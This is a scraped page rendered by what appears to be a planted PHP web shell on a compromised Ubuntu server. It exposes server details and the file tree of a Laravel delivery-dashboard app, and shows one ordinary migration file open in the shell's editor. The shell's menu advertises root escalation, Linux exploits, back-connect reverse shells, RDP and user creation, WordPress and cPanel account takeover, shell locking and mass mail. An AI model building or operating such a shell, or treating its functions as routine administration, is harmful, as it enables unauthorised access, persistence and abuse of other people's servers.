Linux ip-172-31-29-64 6.8.0-1050-aws #53~22.04.1-Ubuntu SMP Fri Mar 13 21:34:27 UTC 2026 x86_64
Apache/2.4.52 (Ubuntu)
: 172.31.29.64 | : 216.73.216.137
Cant Read [ /etc/named.conf ]
5.6.40-77+ubuntu22.04.1+deb.sury.org+1
ubuntu
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
dashboard.maalgaadi /
database /
migrations /
[ HOME SHELL ]
Name
Size
Permission
Action
.gitkeep
0
B
-rwxrwxr-x
2014_10_12_000000_create_users...
1.31
KB
-rwxrwxr-x
2014_10_12_100000_create_passw...
633
B
-rwxrwxr-x
2016_06_09_041515_create_city_...
683
B
-rwxrwxr-x
2016_06_09_041912_create_role_...
639
B
-rwxrwxr-x
2016_06_09_042217_create_modul...
751
B
-rwxrwxr-x
2016_06_09_042517_create_emplo...
735
B
-rwxrwxr-x
2016_06_09_042737_create_vehic...
1.77
KB
-rwxrwxr-x
2016_06_09_043551_create_drive...
1.12
KB
-rwxrwxr-x
2016_06_09_044542_create_emplo...
1.07
KB
-rwxrwxr-x
2016_06_09_044854_create_admin...
765
B
-rwxrwxr-x
2016_06_09_045051_create_custo...
1.1
KB
-rwxrwxr-x
2016_06_09_045341_create_custo...
935
B
-rwxrwxr-x
2016_06_09_045552_create_custo...
878
B
-rwxrwxr-x
2016_06_09_045800_create_drive...
861
B
-rwxrwxr-x
2016_06_09_050112_create_booki...
1.05
KB
-rwxrwxr-x
2016_06_09_050510_create_cance...
690
B
-rwxrwxr-x
2016_06_09_050655_create_drive...
736
B
-rwxrwxr-x
2016_06_09_050900_create_drive...
852
B
-rwxrwxr-x
2016_06_09_051150_create_disco...
1.02
KB
-rwxrwxr-x
2016_06_09_051500_create_booki...
1.61
KB
-rwxrwxr-x
2016_06_09_052238_create_drive...
802
B
-rwxrwxr-x
2016_06_09_052505_create_area_...
725
B
-rwxrwxr-x
2016_06_09_052958_create_loadi...
840
B
-rwxrwxr-x
2016_06_09_053151_create_prici...
648
B
-rwxrwxr-x
2016_06_09_053622_create_favor...
1.27
KB
-rwxrwxr-x
2016_06_09_054059_create_surge...
641
B
-rwxrwxr-x
2016_06_09_054211_create_ratin...
699
B
-rwxrwxr-x
2016_06_16_072853_create_drive...
830
B
-rwxrwxr-x
2016_06_16_073600_create_drive...
715
B
-rwxrwxr-x
2016_06_22_075522_create_drive...
655
B
-rwxrwxr-x
2016_07_04_041353_create_booki...
636
B
-rwxrwxr-x
2016_07_04_124453_create_user_...
681
B
-rwxrwxr-x
2016_07_08_061301_alter_driver...
584
B
-rwxrwxr-x
2016_07_13_133936_alter_driver...
741
B
-rwxrwxr-x
2016_07_13_143540_alter_bookin...
489
B
-rwxrwxr-x
2016_07_13_145758_alter_driver...
489
B
-rwxrwxr-x
2016_07_16_171425_alter_bookin...
499
B
-rwxrwxr-x
2016_07_16_174520_alter_notifi...
670
B
-rwxrwxr-x
2016_07_18_141948_alter_estima...
1.04
KB
-rwxrwxr-x
2016_07_18_142001_alter_final_...
1.43
KB
-rwxrwxr-x
2016_07_18_144123_alter_estima...
607
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 2016_06_09_042217_create_module_alloted_table.php
<?php use Illuminate\Database\Schema\Blueprint; use Illuminate\Database\Migrations\Migration; class CreateModuleAllotedTable extends Migration { /** * Run the migrations. * * @return void */ public function up() { Schema::create('module_allotead', function (Blueprint $table) { $table->increments('id'); $table->integer('role_id'); $table->integer('employee_id'); $table->integer('city_id'); $table->enum('status', ['active', 'inactive']); $table->timestamps(); }); } /** * Reverse the migrations. * * @return void */ public function down() { Schema::drop('module_allotead'); } }
Close